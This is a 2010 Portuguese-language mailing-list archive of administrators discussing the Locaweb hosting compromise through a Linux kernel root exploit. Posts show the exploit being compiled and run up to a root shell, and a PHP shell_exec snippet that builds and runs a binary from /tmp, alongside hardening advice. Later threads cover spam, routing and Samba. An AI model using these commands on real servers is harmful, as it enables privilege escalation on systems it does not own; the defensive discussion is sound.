prepare_creds->ffffffff8024b626 >>>>> $$$ override_creds->ffffffff8024b755 >>>>> $$$ revert_creds->ffffffff8024bbf4 >>>>> $$$ Kernel Credentials detected >>>>> ??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d >>>>> $$$ timer_list_fops->ffffffff806bbb80 >>>>> $$$ w34p0n 0f ch01c3: F0PZzZzzz >>>>> $$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d >>>>> $$$ Prepare: m0rn1ng w0rk0ut b1tch3z >>>>> $$$ Us1ng cr3d s3ash3llc0d3z >>>>> $$$ 0p3n1ng th3 m4giq p0rt4l >>>>> $$$ m4q1c p0rt4l l3n f0und: 0x7fa4543c >>>>> $$$ 0v3r thr0w f0ps g0v3rnm3nt >>>>> $$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP >>>>> sh-3.2# whoami; id >>>>> root >>>>> uid=0(root) gid=500(alexandre) groups=10(wheel),500(alexandre) >>>>> >>>>> >>>>> a fallha ? no sistema de compatibilidade 32bits, veja que forcei o gcc >>>>> compilar o exploit em 32bits.. >>>>> >>>>> em um lik ja publicado aqui, >>>>> (http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/>>>>> ) >>>>> tem um codigo para desligar a compatibilidade 32bits... se nao rodar >>>>> nenhum >>>>> software que seja 32bits.. o melhor eh desativar definitivamente a >>>>> compatibilidade !! >>>>> >>>>> :) >>>>> >>>>> >>>>> >>>>> Em 19/09/2010 15:09, Marcelo M. Fleury escreveu: >>>>>> ? muita prepot?ncia dizer que a locaweb ? amadora. Um dos servi?os da >>>>>> locaweb foi comprometido, em quest?o de horas os servi?os foram >>>>>> normalizados >>>>>> e isso sim ? bom. >>>>>> >>>>>> Procure por dom?nios de grandes provedores aqui: >>>>>> http://www.zone-h.com/archive >>>>>> >>>>>> terra, uol... todos j? foram vitimas. O que a locaweb passou, qualquer um >>>>>> pode passar, tal como j? aconteceu com nasa, m$ e etc(e estamos falando >>>>>> apenas de ataques que se tornaram p?blicos...). >>>>>> >>>>>> O importante ? que eles busquem aprender com o ocorrido, e com certeza >>>>>> isso >>>>>> deve acontecer, elevando ainda mais a sua maturidade. >>>>>> >>>>>> []s >>>>>> >>>>>> Em 18 de setembro de 2010 17:57, Guilherme >>>>>> Boingescreveu: >>>>>> >>>>>>> Roberto, >>>>>>> >>>>>>> Sim, a discuss?o pode ser gigante, mas a culpa, independente do que >>>>>>> houve, >>>>>>> ? >>>>>>> da Locaweb, que ? a respons?vel pela hospedagem desses sites que foram >>>>>>> 'defaceados'. >>>>>>> >>>>>>> N?o podemos por a culpa na RedHat, pois alem de ter sido uma escolha da >>>>>>> pr?pria Locaweb, utilizando o kernel deles, poderia ter aplicado >>>>>>> corre??es >>>>>>> e >>>>>>> m?todos de seguran?a que inibiriam qualquer tipo de exploit local a >>>>>>> n?vel >>>>>>> de >>>>>>> kernel. >>>>>>> Voc? n?o precisa dar permiss?o para o cliente rodar arquivo bin?rio >>>>>>> algum, >>>>>>> se tratando de plataforma web. Muito menos, garantir acesso SSH. >>>>>>> >>>>>>> Se a Locaweb deseja garantir, por comodidade e como um diferencial, >>>>>>> acesso >>>>>>> SSH aos clientes, deveria prezar primeiramente pela seguran?a dos >>>>>>> servidores, para depois sim, tomar um passo deste. >>>>>>> De qualquer forma, ? poss?vel manter seu sistema seguro, independente de >>>>>>> prover o acesso SSH aos clientes ou n?o. >>>>>>> >>>>>>> Essa historia se resume em amadorismo. >>>>>>> >>>>>>> 2010/9/18 Roberto Bert? >>>>>>> >>>>>>>> Ola Guilherme, >>>>>>>> >>>>>>>> Pelos horarios que aconteceram os eventos e as informacoes no twitter. >>>>>>> Pode >>>>>>>> ter sido outra coisa, mas duvido muito. >>>>>>>> >>>>>>>> Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa no >>>>>>>> pessoal que escreveu o codigo do kernel, podemos por a culpa na redhat >>>>>>> por >>>>>>>> nao ter auditado, podemos por a culpa nos pesquisadores que descobriram >>>>>>>> a >>>>>>>> falha, ou nos que divulgaram a falha na internet junto com o exploit, >>>>>>>> ou >>>>>>>> at? >>>>>>>> mesmo nos legisladores do mundo todo por nao termos leis que criem um >>>>>>>> metodo >>>>>>>> seguro de divulgar falhas de seguranca primeiro para as empresas que >>>>>>> podem >>>>>>>> corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. >>>>>>>> >>>>>>>> Nao ? bug de chroot de ftp. >>>>>>>> >>>>>>>> Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem a >>>>>>>> execucao de comados, porque tem php, perl, etc. Entao bastava subir um >>>>>>>> binario compilado e executar ele e voce virava root. Eu reproduzi isso >>>>>>> num >>>>>>>> ambiente de testes. >>>>>>>> >>>>>>>> >>>>>>>> >>>>>>>> 2010/9/18 Guilherme Boing >>>>>>>> >>>>>>>>> Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' >>>>>>> que >>>>>>>>> foi publicado com o acontecido na Locaweb ? >>>>>>>>> >>>>>>>>> E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? de >>>>>>>>> quem, >>>>>>>>> dos usu?rios ? >>>>>>>>> Uma falha no kernel n?o garante acesso privilegiado algum, se o >>>>>>>>> sistema >>>>>>>> for >>>>>>>>> bem protegido e bem administrado. >>>>>>>>> >>>>>>>>> Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser >>>>>>>> executado >>>>>>>>> em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. >>>>>>>>> >>>>>>>>> Sendo um bug de chroot de ftp, um exploit local que elevou os >>>>>>> privil?gios >>>>>>>>> do >>>>>>>>> invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada >>>>>>> pelo >>>>>>>>> ocorrido, pois era de sua responsabilidade, manter o sistema tanto >>>>>>>>> atualizado como bem protegido. >>>>>>>>> >>>>>>>>> 2010/9/18 Roberto Bert? >>>>>>>>> >>>>>>>>>> Viu pessoal, aproveito para divulgar o workaround e a falha, na >>>>>>> segunda >>>>>>>>>> parte do artigo tem info de como proteger. Foi bem grave mesmo >>>>>>>>>> >>>>>>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa>>>>>>> / >>>>>>>>>> < >>>>>>>>>> >>>>>>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa >>>>>>> /> >>>>>>>> __ >>>>>>>> masoch-l list >>>>>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>>>>> >>>>>>> __ >>>>>>> masoch-l list >>>>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>>>> >>>>> -- >>>>> Sds. >>>>> >>>>> Alexandre Jeronimo Correa >>>>> S?cio-Administrador >>>>> >>>>> Onda Internet >>>>> www.onda.net.br >>>>> >>>>> IPV6 Ready ! >>>>> www.ipv6.onda.net.br >>>>> >>>>> __ >>>>> masoch-l list >>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>> >>>> __ >>>> masoch-l list >>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>> >>> >>> -- >>> Sds. >>> >>> Alexandre Jeronimo Correa >>> S?cio-Administrador >>> >>> Onda Internet >>> www.onda.net.br >>> >>> IPV6 Ready ! >>> www.ipv6.onda.net.br >>> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l From welkson at focusautomacao.com.br Mon Sep 20 14:19:11 2010 From: welkson at focusautomacao.com.br (Welkson Renny de Medeiros) Date: Mon, 20 Sep 2010 14:19:11 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: References: <4C97959F.5070605@gmail.com> Message-ID: <4C97978F.6080007@focusautomacao.com.br> Servi?o SSH pelo jeito j? foi bloqueado. Tenho sites l?, tentei logar agora via putty e n?o consegui. ? bem pr?tico o acesso via SSH... mas realmente ? muito risco... melhor deixar desativado mesmo. -- Welkson Renny de Medeiros Desenvolvimento / Ger?ncia de Redes Focus Automa??o Comercial FreeBSD Community Member Guilherme Boing escreveu: > Assim como existem N meios de enviar o arquivo para o servidor, executar, > etc, etc - existem N? meios de bloque?-los. > > 2010/9/20 Egberto Monteiro > > From egbertomonteiro at gmail.com Mon Sep 20 14:20:21 2010 From: egbertomonteiro at gmail.com (egberto) Date: Mon, 20 Sep 2010 14:20:21 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: References: Message-ID: <4C9797D5.30406@gmail.com> SuPHP Att, Egberto Monteiro On 09/20/2010 02:17 PM, Alexandre Gorges wrote: > No php eu desligo algumas coisas > > disable_functions > > escapeshellarg, escapeshellcmd, exec, passthru, proc_close, proc_open, shell > _exec, system, dl, popen, php_check_syntax, php_strip_whitespace, symlink, l > ink, openlog, apache_child_terminate, apache_get_modules, apache_get_version > , apache_getenv, apache_note, apache_sentenv, virtual > > > E limito o opendir para o home onde fica o site: > > open_basedir /home/sites/xxxx.com.br:/usr/share/pear > doc_root /home/sites/xxxx.com.br > > Alguma outra sugestao para o php? > > []'s > Alexandre Gorges > http://www.google.com.br/profiles/algorges > MSN/Skype: alexandre at dag.net.br > ICQ: 2031408 > > > > > >> From: Egberto Monteiro >> Reply-To: Lista Masoch >> Date: Mon, 20 Sep 2010 14:10:55 -0300 >> To: Lista Masoch >> Subject: Re: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre >> ataque cracker >> >> O buraco ? mais embaixo, se o cara envia o arquivo j? compilado? >> >> Deve-se dificultar/impossibilitar a execu??o de arquivos arbitrarios e >> para isso existem N possibilidades. >> >> Att, >> Egberto Monteiro >> >> Em 09/20/2010 01:20 PM, Alexandre Gorges escreveu: >> >>> Chmod 700 /usr/bin/gcc apenas root pode usar. >>> >>> >>> []'s >>> Alexandre Gorges >>> http://www.google.com.br/profiles/algorges >>> MSN/Skype: alexandre at dag.net.br >>> ICQ: 2031408 >>> >>> >>> >>> >>> >>>> From: "Alexandre J. Correa - Onda Internet" >>>> Organization: Onda Internet Ltda. >>>> Reply-To: Lista Masoch >>>> Date: Mon, 20 Sep 2010 12:07:16 -0300 >>>> To: Lista Masoch >>>> Subject: Re: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre >>>> ataque cracker >>>> >>>> mas se o php for bloqueado (extensoes/funoces de execu??o).. ja >>>> dificulta.. >>>> >>>> manter o /tmp e outras pastas de escrita "publica" com permissoes de >>>> noexec no "mount" ... >>>> >>>> >>>> Em 20/09/2010 12:03, Marcelo Coelho escreveu: >>>> >>>>> Alexandre, >>>>> >>>>> Estas medidas apenas criam alguma dificuldade, mas n?o resolvem o problema: >>>>> >>>>> - o invasor pode compilar o exploit remotamente e enviar para o servidor. >>>>> - limita??es de acesso ao wget, nc, shell_exec etc podem ser contornadas >>>>> com >>>>> scripts perl e php. >>>>> >>>>> >>>>> >>>>> On Sep 19, 2010, at 4:16 PM, Alexandre J. Correa - Onda Internet wrote: >>>>> >>>>> >>>>>> Em algum ponto a LocaWeb falhou sim, mas sacrafica-la como tem sido feito, >>>>>> n?o ? "justo" (digamos assim). >>>>>> >>>>>> A falha da locaweb ? comum em v?rias empresas de hosting: >>>>>> >>>>>> - deixar os compiladores acessiveis aos usuarios. >>>>>> - alguns binarios como wget, nc, etc ficam disponiveis para execucao de >>>>>> qualquer usuario.. >>>>>> - permitir a execucao de scripts. >>>>>> - deixar algumas funcoes do php ativas (dl_open, shell_exec, etc) >>>>>> >>>>>> consegui o exploit e fiz testes em varios servidores.. >>>>>> >>>>>> [alexandre at xxx aaa]$ gcc Ac1dB1tch3z.c -m32 -o Ac1dB1tch3z >>>>>> [alexandre at xxx aaa]$ ./Ac1dB1tch3z >>>>>> Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y >>>>>> $$$ Kallsyms +r >>>>>> $$$ K3rn3l r3l3as3: >>>>>> $$$ prepare_creds->ffffffff8024b626 >>>>>> $$$ override_creds->ffffffff8024b755 >>>>>> $$$ revert_creds->ffffffff8024bbf4 >>>>>> $$$ Kernel Credentials detected >>>>>> ??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d >>>>>> $$$ timer_list_fops->ffffffff806bbb80 >>>>>> $$$ w34p0n 0f ch01c3: F0PZzZzzz >>>>>> $$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d >>>>>> $$$ Prepare: m0rn1ng w0rk0ut b1tch3z >>>>>> $$$ Us1ng cr3d s3ash3llc0d3z >>>>>> $$$ 0p3n1ng th3 m4giq p0rt4l >>>>>> $$$ m4q1c p0rt4l l3n f0und: 0x7fa4543c >>>>>> $$$ 0v3r thr0w f0ps g0v3rnm3nt >>>>>> $$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP >>>>>> sh-3.2# whoami; id >>>>>> root >>>>>> uid=0(root) gid=500(alexandre) groups=10(wheel),500(alexandre) >>>>>> >>>>>> >>>>>> a fallha ? no sistema de compatibilidade 32bits, veja que forcei o gcc >>>>>> compilar o exploit em 32bits.. >>>>>> >>>>>> em um lik ja publicado aqui, >>>>>> >>>>>> > (http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/>>>>> > ) > >>>>>> tem um codigo para desligar a compatibilidade 32bits... se nao rodar >>>>>> nenhum >>>>>> software que seja 32bits.. o melhor eh desativar definitivamente a >>>>>> compatibilidade !! >>>>>> >>>>>> :) >>>>>> >>>>>> >>>>>> >>>>>> Em 19/09/2010 15:09, Marcelo M. Fleury escreveu: >>>>>> >>>>>>> ? muita prepot?ncia dizer que a locaweb ? amadora. Um dos servi?os da >>>>>>> locaweb foi comprometido, em quest?o de horas os servi?os foram >>>>>>> normalizados >>>>>>> e isso sim ? bom. >>>>>>> >>>>>>> Procure por dom?nios de grandes provedores aqui: >>>>>>> http://www.zone-h.com/archive >>>>>>> >>>>>>> terra, uol... todos j? foram vitimas. O que a locaweb passou, qualquer um >>>>>>> pode passar, tal como j? aconteceu com nasa, m$ e etc(e estamos falando >>>>>>> apenas de ataques que se tornaram p?blicos...). >>>>>>> >>>>>>> O importante ? que eles busquem aprender com o ocorrido, e com certeza >>>>>>> isso >>>>>>> deve acontecer, elevando ainda mais a sua maturidade. >>>>>>> >>>>>>> []s >>>>>>> >>>>>>> Em 18 de setembro de 2010 17:57, Guilherme >>>>>>> Boingescreveu: >>>>>>> >>>>>>> >>>>>>>> Roberto, >>>>>>>> >>>>>>>> Sim, a discuss?o pode ser gigante, mas a culpa, independente do que >>>>>>>> houve, >>>>>>>> ? >>>>>>>> da Locaweb, que ? a respons?vel pela hospedagem desses sites que foram >>>>>>>> 'defaceados'. >>>>>>>> >>>>>>>> N?o podemos por a culpa na RedHat, pois alem de ter sido uma escolha da >>>>>>>> pr?pria Locaweb, utilizando o kernel deles, poderia ter aplicado >>>>>>>> corre??es >>>>>>>> e >>>>>>>> m?todos de seguran?a que inibiriam qualquer tipo de exploit local a >>>>>>>> n?vel >>>>>>>> de >>>>>>>> kernel. >>>>>>>> Voc? n?o precisa dar permiss?o para o cliente rodar arquivo bin?rio >>>>>>>> algum, >>>>>>>> se tratando de plataforma web. Muito menos, garantir acesso SSH. >>>>>>>> >>>>>>>> Se a Locaweb deseja garantir, por comodidade e como um diferencial, >>>>>>>> acesso >>>>>>>> SSH aos clientes, deveria prezar primeiramente pela seguran?a dos >>>>>>>> servidores, para depois sim, tomar um passo deste. >>>>>>>> De qualquer forma, ? poss?vel manter seu sistema seguro, independente de >>>>>>>> prover o acesso SSH aos clientes ou n?o. >>>>>>>> >>>>>>>> Essa historia se resume em amadorismo. >>>>>>>> >>>>>>>> 2010/9/18 Roberto Bert? >>>>>>>> >>>>>>>> >>>>>>>>> Ola Guilherme, >>>>>>>>> >>>>>>>>> Pelos horarios que aconteceram os eventos e as informacoes no twitter. >>>>>>>>> >>>>>>>> Pode >>>>>>>> >>>>>>>>> ter sido outra coisa, mas duvido muito. >>>>>>>>> >>>>>>>>> Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa no >>>>>>>>> pessoal que escreveu o codigo do kernel, podemos por a culpa na redhat >>>>>>>>> >>>>>>>> por >>>>>>>> >>>>>>>>> nao ter auditado, podemos por a culpa nos pesquisadores que descobriram >>>>>>>>> a >>>>>>>>> falha, ou nos que divulgaram a falha na internet junto com o exploit, >>>>>>>>> ou >>>>>>>>> at? >>>>>>>>> mesmo nos legisladores do mundo todo por nao termos leis que criem um >>>>>>>>> metodo >>>>>>>>> seguro de divulgar falhas de seguranca primeiro para as empresas que >>>>>>>>> >>>>>>>> podem >>>>>>>> >>>>>>>>> corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. >>>>>>>>> >>>>>>>>> Nao ? bug de chroot de ftp. >>>>>>>>> >>>>>>>>> Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem a >>>>>>>>> execucao de comados, porque tem php, perl, etc. Entao bastava subir um >>>>>>>>> binario compilado e executar ele e voce virava root. Eu reproduzi isso >>>>>>>>> >>>>>>>> num >>>>>>>> >>>>>>>>> ambiente de testes. >>>>>>>>> >>>>>>>>> >>>>>>>>> >>>>>>>>> 2010/9/18 Guilherme Boing >>>>>>>>> >>>>>>>>> >>>>>>>>>> Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' >>>>>>>>>> >>>>>>>> que >>>>>>>> >>>>>>>>>> foi publicado com o acontecido na Locaweb ? >>>>>>>>>> >>>>>>>>>> E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? de >>>>>>>>>> quem, >>>>>>>>>> dos usu?rios ? >>>>>>>>>> Uma falha no kernel n?o garante acesso privilegiado algum, se o >>>>>>>>>> sistema >>>>>>>>>> >>>>>>>>> for >>>>>>>>> >>>>>>>>>> bem protegido e bem administrado. >>>>>>>>>> >>>>>>>>>> Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser >>>>>>>>>> >>>>>>>>> executado >>>>>>>>> >>>>>>>>>> em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. >>>>>>>>>> >>>>>>>>>> Sendo um bug de chroot de ftp, um exploit local que elevou os >>>>>>>>>> >>>>>>>> privil?gios >>>>>>>> >>>>>>>>>> do >>>>>>>>>> invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada >>>>>>>>>> >>>>>>>> pelo >>>>>>>> >>>>>>>>>> ocorrido, pois era de sua responsabilidade, manter o sistema tanto >>>>>>>>>> atualizado como bem protegido. >>>>>>>>>> >>>>>>>>>> 2010/9/18 Roberto Bert? >>>>>>>>>> >>>>>>>>>> >>>>>>>>>>> Viu pessoal, aproveito para divulgar o workaround e a falha, na >>>>>>>>>>> >>>>>>>> segunda >>>>>>>> >>>>>>>>>>> parte do artigo tem info de como proteger. Foi bem grave mesmo >>>>>>>>>>> >>>>>>>>>>> >>>>>>>> > http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa>>>>>>> > / > >>>>>>>>>>> < >>>>>>>>>>> >>>>>>>>>>> >>>>>>>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa >>>>>>>> /> >>>>>>>> >>>>>>>>> __ >>>>>>>>> masoch-l list >>>>>>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>>>>>> >>>>>>>>> >>>>>>>> __ >>>>>>>> masoch-l list >>>>>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>>>>> >>>>>>>> >>>>>> -- >>>>>> Sds. >>>>>> >>>>>> Alexandre Jeronimo Correa >>>>>> S?cio-Administrador >>>>>> >>>>>> Onda Internet >>>>>> www.onda.net.br >>>>>> >>>>>> IPV6 Ready ! >>>>>> www.ipv6.onda.net.br >>>>>> >>>>>> __ >>>>>> masoch-l list >>>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>>> >>>>>> >>>>> __ >>>>> masoch-l list >>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>> >>>>> >>>> -- >>>> Sds. >>>> >>>> Alexandre Jeronimo Correa >>>> S?cio-Administrador >>>> >>>> Onda Internet >>>> www.onda.net.br >>>> >>>> IPV6 Ready ! >>>> www.ipv6.onda.net.br >>>> >>>> __ >>>> masoch-l list >>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > From neto-listas at sagem-orga.com.br Mon Sep 20 15:52:12 2010 From: neto-listas at sagem-orga.com.br (=?ISO-8859-1?Q?Jos=E9_Augusto_dos_Santos_Neto?=) Date: Mon, 20 Sep 2010 15:52:12 -0300 Subject: [MASOCH-L] Lacre USB Message-ID: <4C97AD5C.3070405@sagem-orga.com.br> Pessoal, Estou procurando algum fabricante nacional de lacres f?sicos para porta USB, algu?m pode me indicar em pvt ? Att. Neto. From lista at amplus.com.br Tue Sep 21 00:45:22 2010 From: lista at amplus.com.br (Ricardo Vendramini) Date: Tue, 21 Sep 2010 00:45:22 -0300 Subject: [MASOCH-L] SPAM vindo do prodam.sp.gov.br Message-ID: <4C982A52.6060302@amplus.com.br> Pessoal Alguem aqui sabe onde reclamo SPAM vindo da rede do governo de Sao Paulo? Constantemente recebemos SPAM deles: Received: from mxsend.prodam.sp.gov.br (mxsend.prodam.sp.gov.br [189.20.216.28]) Received: from unknown (HELO cprodamibs249.rede.sp) ([10.10.64.249]) by cprodamibs67033.rede.sp with ESMTP; 20 Sep 2010 14:49:33 -0300 Received: by cprodamibs249.prodam with Internet Mail Service (5.5.2656.59) id ; Mon, 20 Sep 2010 15:05:47 -0300 Message-ID: From: Dalton Silvano E ja mandei alguns emails relatando o SPAM para abuse at prodam.sp.gov.br mas ninguem responde e muito menos faz alguma coisa. Ricardo From eniorm at gmail.com Tue Sep 21 07:58:37 2010 From: eniorm at gmail.com (Enio Marconcini # www.Enio.Pro.Br) Date: Tue, 21 Sep 2010 07:58:37 -0300 Subject: [MASOCH-L] SPAM vindo do prodam.sp.gov.br In-Reply-To: <4C982A52.6060302@amplus.com.br> References: <4C982A52.6060302@amplus.com.br> Message-ID: 2010/9/21 Ricardo Vendramini > > > Pessoal > > Alguem aqui sabe onde reclamo SPAM vindo da rede do governo de Sao > Paulo? > > Constantemente recebemos SPAM deles: > > > Received: from mxsend.prodam.sp.gov.br (mxsend.prodam.sp.gov.br[189.20.216.28]) > Received: from unknown (HELO cprodamibs249.rede.sp) ([10.10.64.249]) > by cprodamibs67033.rede.sp with ESMTP; 20 Sep 2010 14:49:33 -0300 > Received: by cprodamibs249.prodam with Internet Mail Service (5.5.2656.59) > id ; Mon, 20 Sep 2010 15:05:47 -0300 > Message-ID: > From: Dalton Silvano > > > E ja mandei alguns emails relatando o SPAM para > abuse at prodam.sp.gov.br mas ninguem responde e muito menos faz alguma > coisa. > > > Ricardo > > > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > avisa a Prodesp que cuida de dom?nios .sp.gov.br -- ENIO RODRIGO MARCONCINI gtalk: eniorm at gmail.com skype: eniorm msn: /dev/null .: FreeBSD -:- OpenBSD -:-Slackware Linux :. Have trouble with Windows - reboot! Have trouble with Unix - be root! From cleber-listas at inetweb.com.br Tue Sep 21 09:24:57 2010 From: cleber-listas at inetweb.com.br (Cleber @ Listas) Date: Tue, 21 Sep 2010 09:24:57 -0300 Subject: [MASOCH-L] RES: SPAM vindo do prodam.sp.gov.br In-Reply-To: <4C982A52.6060302@amplus.com.br> References: <4C982A52.6060302@amplus.com.br> Message-ID: <006901cb5988$01b93390$052b9ab0$@inetweb.com.br> Ricardo, Eles tem algum servidor com relay aberto e tb?m sofremos disso. J? mandei notifica??es a muito tempo sem retorno. Abra?os -----Mensagem original----- De: masoch-l-bounces at eng.registro.br [mailto:masoch-l-bounces at eng.registro.br] Em nome de Ricardo Vendramini Enviada em: ter?a-feira, 21 de setembro de 2010 00:45 Para: masoch-l at eng.registro.br Assunto: [MASOCH-L] SPAM vindo do prodam.sp.gov.br Pessoal Alguem aqui sabe onde reclamo SPAM vindo da rede do governo de Sao Paulo? Constantemente recebemos SPAM deles: Received: from mxsend.prodam.sp.gov.br (mxsend.prodam.sp.gov.br [189.20.216.28]) Received: from unknown (HELO cprodamibs249.rede.sp) ([10.10.64.249]) by cprodamibs67033.rede.sp with ESMTP; 20 Sep 2010 14:49:33 -0300 Received: by cprodamibs249.prodam with Internet Mail Service (5.5.2656.59) id ; Mon, 20 Sep 2010 15:05:47 -0300 Message-ID: From: Dalton Silvano E ja mandei alguns emails relatando o SPAM para abuse at prodam.sp.gov.br mas ninguem responde e muito menos faz alguma coisa. Ricardo __ masoch-l list https://eng.registro.br/mailman/listinfo/masoch-l From roberto at berto.net Tue Sep 21 11:39:26 2010 From: roberto at berto.net (Roberto Berto) Date: Tue, 21 Sep 2010 11:39:26 -0300 Subject: [MASOCH-L] RES: RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: <4C977849.2030901@onda.psi.br> References: <4C942A44.50104@gmail.com> <4C9438CB.3070405@yahoo.com.br> <4C966199.9050006@onda.psi.br> <001601cb58d1$7e6812b0$7b383810$@inetweb.com.br> <4C977849.2030901@onda.psi.br> Message-ID: Nao precisa compilar. Bastava enviar o arquivo ja compilado e executar. 2010/9/20 Alexandre J. Correa - Onda Internet > talvez o atacante n?o usou ssh, simplesmente um script php com o > shell_exec("gcc -m32 /tmp/arquivo.c -o /tmp/arquivo"); > shell_exec("/tmp/arquivo; whoami;"); > > ja resolvia o problema.. > > From roberto.berto at gmail.com Tue Sep 21 11:45:32 2010 From: roberto.berto at gmail.com (=?UTF-8?Q?Roberto_Bert=C3=B3?=) Date: Tue, 21 Sep 2010 11:45:32 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: References: <4C9778A4.1050407@onda.psi.br> Message-ID: Tem uma coisa bacana que d? para fazer que no cPanel implementaram que ? chmod 0750 /usr/bin/gcc chgrp compilers /usr/bin/gcc Ai basta colocar os usarios que tu quer dar acesso nesse grupo. O mesmo vale para outros executaveis que podem ser usados para o mesmo fim /usr/bin/c++ /usr/bin/ld /usr/bin/c99 /usr/bin/c89 /usr/bin/g++ 2010/9/20 Alexandre Gorges > Chmod 700 /usr/bin/gcc apenas root pode usar. > > > []'s > Alexandre Gorges > http://www.google.com.br/profiles/algorges > MSN/Skype: alexandre at dag.net.br > ICQ: 2031408 > > > From willen at ifes.edu.br Tue Sep 21 15:40:07 2010 From: willen at ifes.edu.br (Willen Borges Coelho) Date: Tue, 21 Sep 2010 15:40:07 -0300 Subject: [MASOCH-L] Help Roteamento no Gateway Message-ID: Pessoal to precisando de ajuda com um roteamento do nosso gateway de uma das dmz... Recentemente adquirimos um link maior e redirecionei o default gw do servidor por esse link2(que ? o link novo de maior capacidade)... Eu adicionei uma regra ip rule from mailserver para que esse servidor de e-mail sempre saia pelo link1(que ? o link antigo).... agora as minhas regras do postrouting n?o est?o funcionando( iptables -t nat -A POSTROUTING -s $IP_INTMAIL -j SNAT --to $IP_EXTMAIL1 )...o servidor de e-mail est? saindo com o ip real da interface do link1 do gateway...e n?o com o ip da interface virtual que est? emulado e configurado como MX do nosso dominio... Link1 - eth1 - antigo Link2 - eth2 - novo de maior capacidade O ip do MX est? configurado na eth1:1 e o roteamento default do servidor est? saindo pelo eth2.... Quando eu mudo o default gw para o link1...o postrouting funciona perfeitamente....o que eu preciso fazer? Atenciosamente, Willen Borges Coelho Analista de Tecnologia da Informa??o Coordenadoria de Tecnologia da Informa??o Ifes - Instituto Federal de Educa??o, Ci?ncia e Tecnologia do Esp?rito Santo Campus Cachoeiro de Itapemirim (28) 3526-9027 "Homens superficiais acreditam em sorte; homens s?bios e fortes acreditam em causa e efeito." (Ralph Waldo Emerson) From eduardo.terra at gmail.com Wed Sep 22 12:07:03 2010 From: eduardo.terra at gmail.com (Carlos Eduardo Tavares Terra) Date: Wed, 22 Sep 2010 12:07:03 -0300 Subject: [MASOCH-L] Problemas com Samba e Vista In-Reply-To: <4C7EACD0.90604@bhz.jamef.com.br> References: <4C77FDCB.5060305@bhz.jamef.com.br> <4C7873CE.4010007@bsd.com.br> <4C7EACD0.90604@bhz.jamef.com.br> Message-ID: O pessoal da Red Hat havia lan?ado um novo release do Samba, vers?o 3.3, justamente por problemas de compatibilidade entre o Samba 3.0 e os Windows Vista e 7. N?o sei se a Novell fez o mesmo no SUSE, mas vale uma verificada e talvez atualizar, mesmo que compilando manualmente, para verificar se o problema n?o ? esse. 2010/9/1 Rejaine Monteiro > > Bom, j? fiz v?rias altera??es no Regedit (como descrito em > > http://www.builderau.com.au/blogs/codemonkeybusiness/viewblogpost.htm?p=339270746 > ) > > > Tamb?m adicionei as entradas abaixo no /etc/samba/smb.conf , como > sugerido em algum outro lugar: > > # For compatibility with Windows Vista > client lanman auth = no > client ntlmv2 auth = yes > domain logons = yes > guest account = nobody > netbios name = meuservidor > > > Mas nada.. Utilizo LDAP para autenticar usu?rios e tudo funciona bem. O > usu?rio do Vista consegue loga na m?quina, acessa os compartilhamentos, > abre, modifica, salva etc... > Num dado momento, parece que depois de um tempo sem utilizar, as > conex?es s?o fechadas. Quando ele tenta abrir novamente, parece que ele > n?o consegue mais encontrar o usu?rio da sess?o no LDAP, 